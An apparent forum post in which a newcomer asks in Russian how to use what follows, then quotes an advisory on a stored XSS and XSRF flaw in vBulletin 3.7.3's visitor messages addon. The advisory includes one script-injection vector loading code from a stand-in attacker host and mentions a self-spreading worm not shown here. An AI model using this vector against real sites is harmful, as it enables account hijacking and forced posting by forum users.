А как пользоваться? Я новичёк в этом и нужно учиться

Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
with the visitor messages addon (a clone of a social network wall/comment area).
When posting XSS, the data is run through htmlentities(); before being displayed
to the general public/forum members. However, when posting a new message,
a new notification is sent to the commentee. The commenter posts a XSS vector such as
<script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
and I have included an example worm that makes the user post a new thread with your own
specified subject and message.